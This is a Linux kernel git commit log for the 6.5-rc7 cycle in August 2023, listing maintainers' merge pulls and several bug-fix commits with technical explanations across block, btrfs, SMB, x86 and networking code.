1. 20 Aug, 2023 7 commits
    • smb: client: make smb2_compound_op() return resp buffer on success · c5f44a3d
      Paulo Alcantara authored
      If @out_iov and @out_buftype are passed, then return compounded
      responses regardless whether the request failed or not.  This will be
      useful for detecting reparse points on SMB2_CREATE responses as
      specified in MS-SMB2 2.2.14.
      
      No functional changes.
      Signed-off-by: Paulo Alcantara (SUSE) <pc@manguebit.com>
      Signed-off-by: Steve French <stfrench@microsoft.com>
    • smb: client: move some params to cifs_open_info_data · 8b4e285d
      Paulo Alcantara authored
      Instead of passing @adjust_tz and some reparse point related fields as
      parameters in ->query_path_info() and
      {smb311_posix,cifs}_info_to_fattr() calls, move them to
      cifs_open_info_data structure as they can be easily accessed through
      @data.
      
      No functional changes.
      Signed-off-by: Paulo Alcantara (SUSE) <pc@manguebit.com>
      Signed-off-by: Steve French <stfrench@microsoft.com>
    • smb: client: ensure to try all targets when finding nested links · ce04127c
      Paulo Alcantara authored
      With current implementation, when a nested DFS link is found during
      mount(2), the client follows the referral and then tries to connect to
      all of its targets.  If all targets failed, the client bails out
      rather than retrying remaining targets from previous referral.
      
      Fix this by stacking all referrals and targets so the client can retry
      remaining targets from previous referrals in case all targets of
      current referral have failed.
      
      Thanks to samba, this can be easily tested like below
      
      * Run the following under dfs folder in samba server
      
        $ ln -s "msdfs:srv\\bad-share" link1
        $ ln -s "msdfs:srv\\dfs\\link1,srv\\good-share" link0
      
      * Before patch
      
        $ mount.cifs //srv/dfs/link0 /mnt -o ...
        mount error(2): No such file or directory
        Refer to the mount.cifs(8) manual page (e.g. man mount.cifs)...
      
      * After patch
      
        $ mount.cifs //srv/dfs/link0 /mnt -o ...
        # ls /mnt
        bar  fileshare1  sub
      Signed-off-by: Paulo Alcantara (SUSE) <pc@manguebit.com>
      Signed-off-by: Steve French <stfrench@microsoft.com>
    • smb: client: introduce DFS_CACHE_TGT_LIST() · 3fea12f3
      Paulo Alcantara authored
      Add new helper which declares and initialises target list of a DFS
      referral rather than having to do both separately.
      
      No functional changes.
      Signed-off-by: Paulo Alcantara (SUSE) <pc@manguebit.com>
      Signed-off-by: Steve French <stfrench@microsoft.com>
    • Linux 6.5-rc7 · 706a7415
      Linus Torvalds authored
    • Merge tag 'tty-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty · b320441c
      Linus Torvalds authored
      Pull tty/serial fixes from Greg KH:
       "Here are some small tty and serial core fixes for 6.5-rc7 that resolve
        a lot of reported issues.
      
        Primarily in here are the fixes for the serial bus code from Tony that
        came in -rc1, as it hit wider testing with the huge number of
        different types of systems and serial ports. All of the reported
        issues with duplicate names and other issues with this code are now
        resolved.
      
        Other than that included in here is:
      
         - n_gsm fix for a previous fix
      
         - 8250 lockdep annotation fix
      
         - fsl_lpuart serial driver fix
      
         - TIOCSTI documentation update for previous CAP_SYS_ADMIN change
      
        All of these have been in linux-next for a while with no reported
        problems"
      
      * tag 'tty-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty:
        serial: core: Fix serial core port id, including multiport devices
        serial: 8250: drop lockdep annotation from serial8250_clear_IER()
        tty: n_gsm: fix the UAF caused by race condition in gsm_cleanup_mux
        serial: core: Revert port_id use
        TIOCSTI: Document CAP_SYS_ADMIN behaviour in Kconfig
        serial: 8250: Fix oops for port->pm on uart_change_pm()
        serial: 8250: Reinit port_id when adding back serial8250_isa_devs
        serial: core: Fix kmemleak issue for serial core device remove
        MAINTAINERS: Merge TTY layer and serial drivers
        serial: core: Fix serial_base_match() after fixing controller port name
        serial: core: Fix serial core controller port name to show controller id
        serial: core: Fix serial core port id to not use port->line
        serial: core: Controller id cannot be negative
        tty: serial: fsl_lpuart: Clear the error flags by writing 1 for lpuart32 platforms
    • Merge tag 'rust-fixes-6.5-rc7' of https://github.com/Rust-for-Linux/linux · ec27a636
      Linus Torvalds authored
      Pull rust fix from Miguel Ojeda:
      
       - Macros: fix 'HAS_*' redefinition by the '#[vtable]' macro
         under conditional compilation
      
      * tag 'rust-fixes-6.5-rc7' of https://github.com/Rust-for-Linux/linux:
        rust: macros: vtable: fix `HAS_*` redefinition (`gen_const_name`)
  2. 19 Aug, 2023 8 commits
    • Merge tag 'i2c-for-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/wsa/linux · 9e6c269d
      Linus Torvalds authored
      Pull i2c fixes from Wolfram Sang:
       "Usual set of driver fixes. A bit more than usual because I was
        unavailable for a while"
      
      * tag 'i2c-for-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/wsa/linux:
        i2c: bcm-iproc: Fix bcm_iproc_i2c_isr deadlock issue
        i2c: Update documentation to use .probe() again
        i2c: sun6i-p2wi: Fix an error message in probe()
        i2c: hisi: Only handle the interrupt of the driver's transfer
        i2c: tegra: Fix i2c-tegra DMA config option processing
        i2c: tegra: Fix failure during probe deferral cleanup
        i2c: designware: Handle invalid SMBus block data response length value
        i2c: designware: Correct length byte validation logic
        i2c: imx-lpi2c: return -EINVAL when i2c peripheral clk doesn't work
    • Merge tag 'for-6.5-rc6-tag' of git://git.kernel.org/pub/scm/linux/kernel/git/kdave/linux · 12e6cced
      Linus Torvalds authored
      Pull btrfs fixes from David Sterba:
      
       - fix infinite loop in readdir(), could happen in a big directory when
         files get renamed during enumeration
      
       - fix extent map handling of skipped pinned ranges
      
       - fix a corner case when handling ordered extent length
      
       - fix a potential crash when balance cancel races with pause
      
       - verify correct uuid when starting scrub or device replace
      
      * tag 'for-6.5-rc6-tag' of git://git.kernel.org/pub/scm/linux/kernel/git/kdave/linux:
        btrfs: fix incorrect splitting in btrfs_drop_extent_map_range
        btrfs: fix BUG_ON condition in btrfs_cancel_balance
        btrfs: only subtract from len_to_oe_boundary when it is tracking an extent
        btrfs: fix replace/scrub failure with metadata_uuid
        btrfs: fix infinite directory reads
    • Merge tag 'fbdev-for-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/deller/linux-fbdev · b5cab28b
      Linus Torvalds authored
      Pull fbdev fixes and cleanups from Helge Deller:
      
       - various code cleanups in amifb, atmel_lcdfb, ssd1307fb, kyro and
         goldfishfb
      
      * tag 'fbdev-for-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/deller/linux-fbdev:
        fbdev: goldfishfb: Do not check 0 for platform_get_irq()
        fbdev: atmel_lcdfb: Remove redundant of_match_ptr()
        fbdev: kyro: Remove unused declarations
        fbdev: ssd1307fb: Print the PWM's label instead of its number
        fbdev: mmp: fix value check in mmphw_probe()
        fbdev: amifb: Replace zero-length arrays with DECLARE_FLEX_ARRAY() helper
    • Merge tag 'block-6.5-2023-08-19' of git://git.kernel.dk/linux · 2383ffc4
      Linus Torvalds authored
      Pull block fixes from Jens Axboe:
       "Main thing here is the fix for the regression in flush handling which
        caused IO hangs/stalls for a few reporters. Hopefully that should all
        be sorted out now. Outside of that, just a few minor fixes for issues
        that were introduced in this cycle"
      
      * tag 'block-6.5-2023-08-19' of git://git.kernel.dk/linux:
        blk-mq: release scheduler resource when request completes
        blk-crypto: dynamically allocate fallback profile
        blk-cgroup: hold queue_lock when removing blkg->q_node
        drivers/rnbd: restore sysfs interface to rnbd-client
    • blk-mq: release scheduler resource when request completes · e5c0ca13
      Chengming Zhou authored
      Chuck reported [1] an IO hang problem on NFS exports that reside on SATA
      devices and bisected to commit 615939a2 ("blk-mq: defer to the normal
      submission path for post-flush requests").
      
      We analysed the IO hang problem, found there are two postflush requests
      waiting for each other.
      
      The first postflush request completed the REQ_FSEQ_DATA sequence, so go to
      the REQ_FSEQ_POSTFLUSH sequence and added in the flush pending list, but
      failed to blk_kick_flush() because of the second postflush request which
      is inflight waiting in scheduler queue.
      
      The second postflush waiting in scheduler queue can't be dispatched because
      the first postflush hasn't released scheduler resource even though it has
      completed by itself.
      
      Fix it by releasing scheduler resource when the first postflush request
      completed, so the second postflush can be dispatched and completed, then
      make blk_kick_flush() succeed.
      
      While at it, remove the check for e->ops.finish_request, as all
      schedulers set that. Reaffirm this requirement by adding a WARN_ON_ONCE()
      at scheduler registration time, just like we do for insert_requests and
      dispatch_request.
      
      [1] https://lore.kernel.org/all/7A57C7AE-A51A-4254-888B-FE15CA21F9E9@oracle.com/
      
      Link: https://lore.kernel.org/linux-block/20230819031206.2744005-1-chengming.zhou@linux.dev/
      Reported-by: kernel test robot <oliver.sang@intel.com>
      Closes: https://lore.kernel.org/oe-lkp/202308172100.8ce4b853-oliver.sang@intel.com
      Fixes: 615939a2 ("blk-mq: defer to the normal submission path for post-flush requests")
      Reported-by: Chuck Lever <chuck.lever@oracle.com>
      Signed-off-by: Chengming Zhou <zhouchengming@bytedance.com>
      Tested-by: Chuck Lever <chuck.lever@oracle.com>
      Link: https://lore.kernel.org/r/20230813152325.3017343-1-chengming.zhou@linux.dev
      [axboe: folded in incremental fix and added tags]
      Signed-off-by: Jens Axboe <axboe@kernel.dk>
    • Merge tag 'media/v6.5-3' of git://git.kernel.org/pub/scm/linux/kernel/git/mchehab/linux-media · aa9ea98c
      Linus Torvalds authored
      Pull media fixes from Mauro Carvalho Chehab:
       "Three driver fixes"
      
      * tag 'media/v6.5-3' of git://git.kernel.org/pub/scm/linux/kernel/git/mchehab/linux-media:
        media: imx: imx7-media-csi: Fix applying format constraints
        media: uvcvideo: Fix menu count handling for userspace XU mappings
        media: mtk-jpeg: Set platform driver data earlier
    • Merge tag 'x86_urgent_for_v6.5_rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/tip · bf98bae3
      Linus Torvalds authored
      Pull x86 fixes from Borislav Petkov:
       "Extraordinary embargoed times call for extraordinary measures. That's
        why this week's x86/urgent branch is larger than usual, containing all
        the known fallout fixes after the SRSO mitigation got merged.
      
        I know, it is a bit late in the game but everyone who has reported a
        bug stemming from the SRSO pile, has tested that branch and has
        confirmed that it fixes their bug.
      
        Also, I've run it on every possible hardware I have and it is looking
        good. It is running on this very machine while I'm typing, for 2 days
        now without an issue. Famous last words...
      
         - Use LEA ...%rsp instead of ADD %rsp in the Zen1/2 SRSO return
           sequence as latter clobbers flags which interferes with fastop
           emulation in KVM, leading to guests freezing during boot
      
         - A fix for the DIV(0) quotient data leak on Zen1 to clear the
           divider buffers at the right time
      
         - Disable the SRSO mitigation on unaffected configurations as it got
           enabled there unnecessarily
      
         - Change .text section name to fix CONFIG_LTO_CLANG builds
      
         - Improve the optprobe indirect jmp check so that certain
           configurations can still be able to use optprobes at all
      
         - A serious and good scrubbing of the untraining routines by PeterZ:
            - Add proper speculation stopping traps so that objtool is happy
            - Adjust objtool to handle the new thunks
            - Make the thunk pointer assignable to the different untraining
              sequences at runtime, thus avoiding the alternative at the
              return thunk. It simplifies the code a bit too.
            - Add an entry_untrain_ret() main entry point which selects the
              respective untraining sequence
            - Rename things so that they're more clear
            - Fix stack validation with FRAME_POINTER=y builds
      
         - Fix static call patching to handle when a JMP to the return thunk
           is the last insn on the very last module memory page
      
         - Add more documentation about what each untraining routine does and
           why"
      
      * tag 'x86_urgent_for_v6.5_rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/tip:
        x86/srso: Correct the mitigation status when SMT is disabled
        x86/static_call: Fix __static_call_fixup()
        objtool/x86: Fixup frame-pointer vs rethunk
        x86/srso: Explain the untraining sequences a bit more
        x86/cpu/kvm: Provide UNTRAIN_RET_VM
        x86/cpu: Cleanup the untrain mess
        x86/cpu: Rename srso_(.*)_alias to srso_alias_\1
        x86/cpu: Rename original retbleed methods
        x86/cpu: Clean up SRSO return thunk mess
        x86/alternative: Make custom return thunk unconditional
        objtool/x86: Fix SRSO mess
        x86/cpu: Fix up srso_safe_ret() and __x86_return_thunk()
        x86/cpu: Fix __x86_return_thunk symbol type
        x86/retpoline,kprobes: Skip optprobe check for indirect jumps with retpolines and IBT
        x86/retpoline,kprobes: Fix position of thunk sections with CONFIG_LTO_CLANG
        x86/srso: Disable the mitigation on unaffected configurations
        x86/CPU/AMD: Fix the DIV(0) initial fix attempt
        x86/retpoline: Don't clobber RFLAGS during srso_safe_ret()
    • Merge tag 'powerpc-6.5-6' of git://git.kernel.org/pub/scm/linux/kernel/git/powerpc/linux · 4e7ffde6
      Linus Torvalds authored
      Pull powerpc fix from Michael Ellerman:
      
       - Fix hardened usercopy BUG when using /proc based firmware update
         interface
      
      Thanks to Nathan Lynch and Kees Cook.
      
      * tag 'powerpc-6.5-6' of git://git.kernel.org/pub/scm/linux/kernel/git/powerpc/linux:
        powerpc/rtas_flash: allow user copy to flash block cache objects
  3. 18 Aug, 2023 16 commits
    • blk-crypto: dynamically allocate fallback profile · c984ff14
      Sweet Tea Dorminy authored
      blk_crypto_profile_init() calls lockdep_register_key(), which warns and
      does not register if the provided memory is a static object.
      blk-crypto-fallback currently has a static blk_crypto_profile and calls
      blk_crypto_profile_init() thereupon, resulting in the warning and
      failure to register.
      
      Fortunately it is simple enough to use a dynamically allocated profile
      and make lockdep function correctly.
      
      Fixes: 2fb48d88 ("blk-crypto: use dynamic lock class for blk_crypto_profile::lock")
      Cc: stable@vger.kernel.org
      Signed-off-by: Sweet Tea Dorminy <sweettea-kernel@dorminy.me>
      Reviewed-by: Eric Biggers <ebiggers@google.com>
      Link: https://lore.kernel.org/r/20230817141615.15387-1-sweettea-kernel@dorminy.me
      Signed-off-by: Jens Axboe <axboe@kernel.dk>
    • blk-cgroup: hold queue_lock when removing blkg->q_node · c164c7bc
      Ming Lei authored
      When blkg is removed from q->blkg_list from blkg_free_workfn(), queue_lock
      has to be held, otherwise, all kinds of bugs (list corruption, hard lockup,
      ...) can be triggered from blkg_destroy_all().
      
      Fixes: f1c006f1 ("blk-cgroup: synchronize pd_free_fn() from blkg_free_workfn() and blkcg_deactivate_policy()")
      Cc: Yu Kuai <yukuai3@huawei.com>
      Cc: xiaoli feng <xifeng@redhat.com>
      Cc: Chunyu Hu <chuhu@redhat.com>
      Cc: Mike Snitzer <snitzer@kernel.org>
      Cc: Tejun Heo <tj@kernel.org>
      Signed-off-by: Ming Lei <ming.lei@redhat.com>
      Acked-by: Tejun Heo <tj@kernel.org>
      Link: https://lore.kernel.org/r/20230817141751.1128970-1-ming.lei@redhat.com
      Signed-off-by: Jens Axboe <axboe@kernel.dk>
    • drivers/rnbd: restore sysfs interface to rnbd-client · 6548fce0
      Li Zhijian authored
      Commit 137380c0 renamed 'rnbd-client' to 'rnbd_client', this changed
      sysfs interface to /sys/devices/virtual/rnbd_client/ctl/map_device
      from /sys/devices/virtual/rnbd-client/ctl/map_device.
      
      CC: Ivan Orlov <ivan.orlov0322@gmail.com>
      CC: "Md. Haris Iqbal" <haris.iqbal@ionos.com>
      CC: Jack Wang <jinpu.wang@ionos.com>
      Fixes: 137380c0 ("block/rnbd: make all 'class' structures const")
      Signed-off-by: Li Zhijian <lizhijian@fujitsu.com>
      Acked-by: Jack Wang <jinpu.wang@ionos.com>
      Link: https://lore.kernel.org/r/20230816022210.2501228-1-lizhijian@fujitsu.com
      Signed-off-by: Jens Axboe <axboe@kernel.dk>
    • Merge tag 'arm64-fixes' of git://git.kernel.org/pub/scm/linux/kernel/git/arm64/linux · d4ddefee
      Linus Torvalds authored
      Pull arm64 fixes from Catalin Marinas:
       "Two more SME fixes related to ptrace(): ensure that the SME is
        properly set up for the target thread and that the thread sees
        the ZT registers set via ptrace"
      
      * tag 'arm64-fixes' of git://git.kernel.org/pub/scm/linux/kernel/git/arm64/linux:
        arm64/ptrace: Ensure that the task sees ZT writes on first use
        arm64/ptrace: Ensure that SME is set up for target when writing SSVE state
    • Merge tag 'gpio-fixes-for-v6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/brgl/linux · 3e13eee1
      Linus Torvalds authored
      Pull gpio fixes from Bartosz Golaszewski:
      
       - fix a regression in the sysfs interface
      
       - fix a reference counting bug that's been around for years
      
       - MAINTAINERS update
      
      * tag 'gpio-fixes-for-v6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/brgl/linux:
        gpiolib: fix reference leaks when removing GPIO chips still in use
        gpiolib: sysfs: Do unexport GPIO when user asks for it
        MAINTAINERS: add content regex for gpio-regmap
    • Merge tag '6.5-rc6-smb3-client-fix' of git://git.samba.org/sfrench/cifs-2.6 · 8abd7287
      Linus Torvalds authored
      Pull smb client fix from Steve French:
       "A small SMB mount option fix, also for stable"
      
      * tag '6.5-rc6-smb3-client-fix' of git://git.samba.org/sfrench/cifs-2.6:
        smb: client: fix null auth
    • Merge tag 'riscv-for-linus-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/riscv/linux · cd479d9c
      Linus Torvalds authored
      Pull RISC-V fixes from Palmer Dabbelt:
      
       - avoid excessive rejections from seccomp RET_ERRNO rules
      
       - compressed jal/jalr decoding fix
      
       - fixes for independent irq/softirq stacks on kernels built with
         CONFIG_FRAME_POINTER=n
      
       - avoid a hang handling uaccess fixups
      
       - another build fix for toolchain ISA strings, this time for Zicsr and
         Zifencei on old GNU toolchains
      
      * tag 'riscv-for-linus-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/riscv/linux:
        riscv: Handle zicsr/zifencei issue between gcc and binutils
        riscv: uaccess: Return the number of bytes effectively not copied
        riscv: stack: Fixup independent softirq stack for CONFIG_FRAME_POINTER=n
        riscv: stack: Fixup independent irq stack for CONFIG_FRAME_POINTER=n
        riscv: correct riscv_insn_is_c_jr() and riscv_insn_is_c_jalr()
        riscv: entry: set a0 = -ENOSYS only when syscall != -1
    • Merge tag 'sound-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/tiwai/sound · ce03e180
      Linus Torvalds authored
      Pull sound fixes from Takashi Iwai:
       "Slightly bigger than I wished, but here we go, a collection of fixes
        for 6.5.
      
        The only change in the core side is the ease for repeated ASoC error
        messages, and the rest are all pretty device-specific small fixes
        (including regression fixes) for ASoC Intel and HD-audio / USB-audio
        quirks"
      
      * tag 'sound-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/tiwai/sound:
        ALSA: hda/realtek - Remodified 3k pull low procedure
        ASoC: rt1308-sdw: fix random louder sound
        ALSA: hda/cs8409: Support new Dell Dolphin Variants
        ALSA: hda/realtek: Switch Dell Oasis models to use SPI
        ALSA: hda/realtek: Add quirks for HP G11 Laptops
        ASoC: meson: axg-tdm-formatter: fix channel slot allocation
        ASoC: SOF: ipc4-topology: Update the basecfg for copier earlier
        ASoC: SOF: intel: hda: Clean up link DMA for IPC3 during stop
        ASoC: Intel: sof-sdw-cs42142: fix for codec button mapping
        ASoC: Intel: sof-sdw: update jack detection quirk for LunarLake RVP
        ASoC: SOF: Fix incorrect use of sizeof in sof_ipc3_do_rx_work()
        ASoC: lower "no backend DAIs enabled for ... Port" log severity
        ASoC: rt5665: add missed regulator_bulk_disable
        ASoC: max98363: don't return on success reading revision ID
        ALSA: usb-audio: Add support for Mythware XA001AU capture and playback interfaces.
        ASoC: fsl: micfil: Use dual license micfil code
    • Merge tag 'mmc-v6.5-rc1-2' of git://git.kernel.org/pub/scm/linux/kernel/git/ulfh/mmc · 88d4a164
      Linus Torvalds authored
      Pull MMC fixes from Ulf Hansson:
       "MMC core:
         - Fix in_flight[issue_type] value error to properly manage requests
      
        MMC host:
         - wbsd: Fix double free in the probe error path
         - sunplus: Fix error path in probe
         - sdhci_f_sdh30: Fix order of function calls in sdhci_f_sdh30_remove"
      
      * tag 'mmc-v6.5-rc1-2' of git://git.kernel.org/pub/scm/linux/kernel/git/ulfh/mmc:
        mmc: f-sdh30: fix order of function calls in sdhci_f_sdh30_remove
        mmc: sunplus: Fix error handling in spmmc_drv_probe()
        mmc: sunplus: fix return value check of mmc_add_host()
        mmc: wbsd: fix double mmc_free_host() in wbsd_init()
        mmc: block: Fix in_flight[issue_type] value error
    • Merge tag 'pinctrl-v6.5-3' of git://git.kernel.org/pub/scm/linux/kernel/git/linusw/linux-pinctrl · f33fd7eb
      Linus Torvalds authored
      Pull pin control fixes from Linus Walleij:
       "Fixes two issues with the Qualcomm SA8775P platform:
      
         - Some minor device tree binding flunky that is nice to iron out but
           more importantly:
      
         - Support the increased interrupt targets mask from 3 to 4 bits,
           making interrupts with higher (hardware) numbers work"
      
      * tag 'pinctrl-v6.5-3' of git://git.kernel.org/pub/scm/linux/kernel/git/linusw/linux-pinctrl:
        pinctrl: qcom: Add intr_target_width field to support increased number of interrupt targets
        dt-bindings: pinctrl: qcom,sa8775p-tlmm: add gpio function constant
    • Merge tag 'soc-fixes-6.5-3' of git://git.kernel.org/pub/scm/linux/kernel/git/soc/soc · 80706f55
      Linus Torvalds authored
      Pull ARM SoC fixes from Arnd Bergmann:
       "As usual, mostly DT fixes for the major Arm platforms from Qualcomm
        and NXP, plus a bit for Rockchips and others:
      
        The qualcomm fixes mainly deal with their higher-end arm64 devices
        trees, fixing issues in L3 interconnect, crypto, thermal, UFS and a
        regression for the DSI phy.
      
        NXP i.MX has two correctness fixes for the 64-bit chips, dealing with
        the imx93 "anatop" module and the CSI interface. On the 32-bit side,
        there are functional fixes for RTC, display and SD card interfaces.
      
        Rockchip fixes are for wifi support on certain boards, a eMMC
        stability and DT build warnings.
      
        On TI OMAP, a regulator is described in DT to avoid problems with the
        ethernet phy initialization.
      
        The code changes include a missing MMIO serialization on OMAP, plus a
        few minor fixes on ASpeed and AMD/Zynq chips"
      
      * tag 'soc-fixes-6.5-3' of git://git.kernel.org/pub/scm/linux/kernel/git/soc/soc: (30 commits)
        ARM: dts: am335x-bone-common: Add vcc-supply for on-board eeprom
        ARM: dts: am335x-bone-common: Add GPIO PHY reset on revision C3 board
        soc: aspeed: socinfo: Add kfree for kstrdup
        soc: aspeed: uart-routing: Use __sysfs_match_string
        ARM: dts: integrator: fix PCI bus dtc warnings
        arm64: dts: imx93: Fix anatop node size
        arm64: dts: qcom: sc7180: Fix DSI0_PHY reg-names
        ARM: dts: imx: Set default tuning step for imx6sx usdhc
        arm64: dts: imx8mm: Drop CSI1 PHY reference clock configuration
        arm64: dts: imx8mn: Drop CSI1 PHY reference clock configuration
        ARM: dts: imx: Set default tuning step for imx7d usdhc
        ARM: dts: imx6: phytec: fix RTC interrupt level
        ARM: dts: imx6sx: Remove LDB endpoint
        arm64: dts: rockchip: Fix Wifi/Bluetooth on ROCK Pi 4 boards
        ARM: zynq: Explicitly include correct DT includes
        arm64: dts: qcom: sa8775p-ride: Update L4C parameters
        arm64: dts: rockchip: minor whitespace cleanup around '='
        arm64: dts: rockchip: Disable HS400 for eMMC on ROCK 4C+
        arm64: dts: rockchip: Disable HS400 for eMMC on ROCK Pi 4
        arm64: dts: rockchip: add missing space before { on indiedroid nova
        ...
    • Merge tag 'asm-generic-fix-6.5' of git://git.kernel.org/pub/scm/linux/kernel/git/arnd/asm-generic · eabeef90
      Linus Torvalds authored
      Pull asm-generic regression fix from Arnd Bergmann:
       "Just one partial revert for a commit from the merge window that caused
        annoying behavior when building old kernels on arm64 hosts"
      
      * tag 'asm-generic-fix-6.5' of git://git.kernel.org/pub/scm/linux/kernel/git/arnd/asm-generic:
        asm-generic: partially revert "Unify uapi bitsperlong.h for arm64, riscv and loongarch"
    • btrfs: fix incorrect splitting in btrfs_drop_extent_map_range · c962098c
      Josef Bacik authored
      In production we were seeing a variety of WARN_ON()'s in the extent_map
      code, specifically in btrfs_drop_extent_map_range() when we have to call
      add_extent_mapping() for our second split.
      
      Consider the following extent map layout
      
      	PINNED
      	[0 16K)  [32K, 48K)
      
      and then we call btrfs_drop_extent_map_range for [0, 36K), with
      skip_pinned == true.  The initial loop will have
      
      	start = 0
      	end = 36K
      	len = 36K
      
      we will find the [0, 16k) extent, but since we are pinned we will skip
      it, which has this code
      
      	start = em_end;
      	if (end != (u64)-1)
      		len = start + len - em_end;
      
      em_end here is 16K, so now the values are
      
      	start = 16K
      	len = 16K + 36K - 16K = 36K
      
      len should instead be 20K.  This is a problem when we find the next
      extent at [32K, 48K), we need to split this extent to leave [36K, 48k),
      however the code for the split looks like this
      
      	split->start = start + len;
      	split->len = em_end - (start + len);
      
      In this case we have
      
      	em_end = 48K
      	split->start = 16K + 36K       // this should be 16K + 20K
      	split->len = 48K - (16K + 36K) // this overflows as 16K + 36K is 52K
      
      and now we have an invalid extent_map in the tree that potentially
      overlaps other entries in the extent map.  Even in the non-overlapping
      case we will have split->start set improperly, which will cause problems
      with any block related calculations.
      
      We don't actually need len in this loop, we can simply use end as our
      end point, and only adjust start up when we find a pinned extent we need
      to skip.
      
      Adjust the logic to do this, which keeps us from inserting an invalid
      extent map.
      
      We only skip_pinned in the relocation case, so this is relatively rare,
      except in the case where you are running relocation a lot, which can
      happen with auto relocation on.
      
      Fixes: 55ef6899 ("Btrfs: Fix btrfs_drop_extent_cache for skip pinned case")
      CC: stable@vger.kernel.org # 4.14+
      Reviewed-by: Filipe Manana <fdmanana@suse.com>
      Signed-off-by: Josef Bacik <josef@toxicpanda.com>
      Signed-off-by: David Sterba <dsterba@suse.com>
    • x86/srso: Correct the mitigation status when SMT is disabled · 6405b72e
      Borislav Petkov (AMD) authored
      Specify how SRSO is mitigated when SMT is disabled. Also, correct the
      SMT check for that.
      
      Fixes: e9fbc47b ("x86/srso: Disable the mitigation on unaffected configurations")
      Suggested-by: default avatarJosh Poimboeuf <jpoimboe@kernel.org>
      Signed-off-by: default avatarBorislav Petkov (AMD) <bp@alien8.de>
      Acked-by: default avatarJosh Poimboeuf <jpoimboe@kernel.org>
      Link: https://lore.kernel.org/r/20230814200813.p5czl47zssuej7nv@treble
      6405b72e
    • Merge tag 'net-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/netdev/net · 0e8860d2
      Linus Torvalds authored
      Pull networking fixes from Jakub Kicinski:
       "Including fixes from ipsec and netfilter.
      
        No known outstanding regressions.
      
        Fixes to fixes:
      
         - virtio-net: set queues after driver_ok, avoid a potential race
           added by recent fix
      
         - Revert "vlan: Fix VLAN 0 memory leak", it may lead to a warning
           when VLAN 0 is registered explicitly
      
         - nf_tables:
            - fix false-positive lockdep splat in recent fixes
            - don't fail inserts if duplicate has expired (fix test failures)
            - fix races between garbage collection and netns dismantle
      
        Current release - new code bugs:
      
         - mlx5: Fix mlx5_cmd_update_root_ft() error flow
      
        Previous releases - regressions:
      
         - phy: fix IRQ-based wake-on-lan over hibernate / power off
      
        Previous releases - always broken:
      
         - sock: fix misuse of sk_under_memory_pressure() preventing system
           from exiting global TCP memory pressure if a single cgroup is under
           pressure
      
         - fix the RTO timer retransmitting skb every 1ms if linear option is
           enabled
      
         - af_key: fix sadb_x_filter validation, amend netlink policy
      
         - ipsec: fix slab-use-after-free in decode_session6()
      
         - macb: in ZynqMP resume always configure PS GTR for non-wakeup
           source
      
        Misc:
      
         - netfilter: set default timeout to 3 secs for sctp shutdown send and
           recv state (from 300ms), align with protocol timers"
      
      * tag 'net-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/netdev/net: (49 commits)
        ice: Block switchdev mode when ADQ is active and vice versa
        qede: fix firmware halt over suspend and resume
        net: do not allow gso_size to be set to GSO_BY_FRAGS
        sock: Fix misuse of sk_under_memory_pressure()
        sfc: don't fail probe if MAE/TC setup fails
        sfc: don't unregister flow_indr if it was never registered
        net: dsa: mv88e6xxx: Wait for EEPROM done before HW reset
        net/mlx5: Fix mlx5_cmd_update_root_ft() error flow
        net/mlx5e: XDP, Fix fifo overrun on XDP_REDIRECT
        i40e: fix misleading debug logs
        iavf: fix FDIR rule fields masks validation
        ipv6: fix indentation of a config attribute
        mailmap: add entries for Simon Horman
        broadcom: b44: Use b44_writephy() return value
        net: openvswitch: reject negative ifindex
        team: Fix incorrect deletion of ETH_P_8021AD protocol vid from slaves
        net: phy: broadcom: stub c45 read/write for 54810
        netfilter: nft_dynset: disallow object maps
        netfilter: nf_tables: GC transaction race with netns dismantle
        netfilter: nf_tables: fix GC transaction races with netns and netlink event exit path
        ...
      0e8860d2
    • Merge tag 'drm-fixes-2023-08-18-1' of git://anongit.freedesktop.org/drm/drm · 1ada9c07
      Linus Torvalds authored
      Pull drm fixes from Dave Airlie:
       "Regular enough week, mostly the usual amdgpu and i915 fixes.  Also
        qaic, nouveau, qxl and a revert for an EDID patch that had some side
        effects, along with a couple of panel fixes.
      
        edid:
         - revert mode parsing fix that had side effects.
      
        i915:
         - Fix the flow for ignoring GuC SLPC efficient frequency selection
         - Fix SDVO panel_type initialization
         - Fix display probe for IVB Q and IVB D GT2 server
      
        nouveau:
         - fix use-after-free in connector code
      
        qaic:
         - integer overflow check fix
         - fix slicing memory leak
      
        panel:
         - fix JDI LT070ME05000 probing
         - fix AUO G121EAN01 timings
      
        amdgpu:
         - SMU 13.x fixes
         - Fix mcbp parameter for gfx9
         - SMU 11.x fixes
         - Temporary fix for large numbers of XCP partitions
         - S0ix fixes
         - DCN 2.0 fix
      
        qxl:
         - fix use after free race in dumb object allocation"
      
      * tag 'drm-fixes-2023-08-18-1' of git://anongit.freedesktop.org/drm/drm:
        drm/qxl: fix UAF on handle creation
        Revert "drm/edid: Fix csync detailed mode parsing"
        drm/nouveau/disp: fix use-after-free in error handling of nouveau_connector_create
        Revert "Revert "drm/amdgpu/display: change pipe policy for DCN 2.0""
        drm/amd: flush any delayed gfxoff on suspend entry
        drm/amdgpu: skip fence GFX interrupts disable/enable for S0ix
        drm/amdgpu: skip xcp drm device allocation when out of drm resource
        drm/amd/pm: Update pci link width for smu v13.0.6
        drm/amd/pm: Fix temperature unit of SMU v13.0.6
        drm/amdgpu/pm: fix throttle_status for other than MP1 11.0.7
        drm/amdgpu: disable mcbp if parameter zero is set
        drm/amd/pm: disallow the fan setting if there is no fan on smu 13.0.0
        accel/qaic: Clean up integer overflow checking in map_user_pages()
        accel/qaic: Fix slicing memory leak
